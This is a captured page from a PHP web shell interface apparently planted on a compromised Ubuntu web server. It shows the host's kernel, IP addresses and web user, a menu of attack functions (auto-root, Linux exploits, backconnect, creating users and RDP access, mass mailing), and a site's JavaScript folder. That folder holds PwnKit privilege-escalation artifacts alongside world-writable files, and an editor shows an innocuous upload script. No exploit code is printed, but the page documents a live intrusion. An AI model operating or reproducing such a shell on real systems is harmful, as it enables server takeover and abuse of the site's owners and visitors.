Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.216.57.57
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
website /
bkmh /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-sr-x
GCONV_PATH=.
[ DIR ]
drwxr-sr-x
shims
[ DIR ]
drwxrwsrwx
.mad-root
0
B
-rw-r--r--
1-cfa.engine.min.js
2.4
KB
-rwxrwxrwx
1-cfa.modernizr.min.js
19.31
KB
-rwxrwxrwx
1-cookieconsent.min.js
20.32
KB
-rwxrwxrwx
1-counter.js
4.15
KB
-rwxrwxrwx
1-functions.js
6.6
KB
-rwxrwxrwx
1-html5.js
10.09
KB
-rwxrwxrwx
1-jquery-migrate.min.js
7.03
KB
-rwxrwxrwx
1-jquery.js
93.73
KB
-rwxrwxrwx
1-main.js
508
B
-rwxrwxrwx
1-skip-link-focus-fix.js
1.04
KB
-rwxrwxrwx
1-szp-embed.min.js
1.49
KB
-rwxrwxrwx
1-venobox.min.js
13.66
KB
-rwxrwxrwx
bkhmcc.js
14.84
KB
-rwxrwxrwx
bkhmindex.js
19.9
KB
-rwxrwxrwx
bkhmlogData.js
239
B
-rwxrwxrwx
cfa.engine.min.js
2.4
KB
-rwxrwxrwx
cfa.modernizr.min.js
19.25
KB
-rwxrwxrwx
comment-reply.min.js
1.06
KB
-rwxrwxrwx
cookieconsent.min.js
20.32
KB
-rwxrwxrwx
core.min.js
3.9
KB
-rwxrwxrwx
counter.js
4.15
KB
-rwxrwxrwx
dasboardimg.js
2.18
KB
-rwxrwxrwx
dashboardimg.js
394
B
-rwxrwxrwx
functions.js
6.6
KB
-rwxrwxrwx
gma.script.js
5.95
KB
-rwxrwxrwx
html5.js
10.09
KB
-rwxrwxrwx
index.js
11.76
KB
-rwxrwxrwx
jquery-migrate.min.js
7.03
KB
-rwxrwxrwx
jquery.backstretch.min.js
4.14
KB
-rwxrwxrwx
jquery.flexslider-min.js
30.25
KB
-rwxrwxrwx
jquery.js
93.73
KB
-rwxrwxrwx
jquery.stellar.min.js
12.17
KB
-rwxrwxrwx
jquery.waypoints.min.js
8.59
KB
-rwxrwxrwx
log.js
631
B
-rwxrwxrwx
logData.js
239
B
-rwxrwxrwx
main.js
508
B
-rwxrwxrwx
markerwithlabel_packed.js
5.75
KB
-rwxrwxrwx
mp-waypoint-animations.js
623
B
-rwxrwxrwx
photogallery.js
24.54
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
selectstyle.css
2.37
KB
-rwxrwxrwx
skip-link-focus-fix.js
1.04
KB
-rwxrwxrwx
szp-embed.min.js
1.49
KB
-rwxrwxrwx
tabs.min.js
11.84
KB
-rwxrwxrwx
venobox.min.js
13.66
KB
-rwxrwxrwx
widget.min.js
6.75
KB
-rwxrwxrwx
wow.min.js
6.92
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dasboardimg.js
// document // .getElementById("loginForm") // .addEventListener("submit", function (event) { // event.preventDefault(); // var username = document.getElementById("username").value; // var password = document.getElementById("password").value; // if (username === "user" && password === "password") { // window.location.href = "dashboard.html"; // } else { // alert("Invalid username or password"); // } // }); // function dragOverHandler(event) { // event.preventDefault(); // } // function dropHandler(event) { // event.preventDefault(); // const files = event.dataTransfer.files; // if (files.length > 0) { // const file = files[0]; // const formData = new FormData(); // formData.append("file", file); // fetch("/upload", { // method: "POST", // body: formData, // }) // .then((response) => response.json()) // .then((data) => { // console.log("Upload successful:", data); // alert("File uploaded successfully"); // }) // .catch((error) => { // console.error("Error uploading file:", error); // alert("Error uploading file"); // }); // } // } // function uploadPhoto() { // var fileInput = document.getElementById("fileInput"); // var file = fileInput.files[0]; // if (file) { // var reader = new FileReader(); // reader.onload = function (e) { // var preview = document.getElementById("preview"); // var img = document.createElement("img"); // img.src = e.target.result; // preview.innerHTML = ""; // preview.appendChild(img); // }; // reader.readAsDataURL(file); // } // } function allowDrop(ev) { ev.preventDefault(); } function drag(ev) { ev.dataTransfer.setData("text", ev.target.id); } function drop(ev) { ev.preventDefault(); var data = ev.dataTransfer.getData("text"); // Get the dropped file var file = ev.dataTransfer.files[0]; // Perform file upload here (you can implement your upload logic) if (file) { // You can use fetch API or XMLHttpRequest to upload the file to the server // For demonstration, let's just log the file details console.log("File uploaded:", file); } }
Close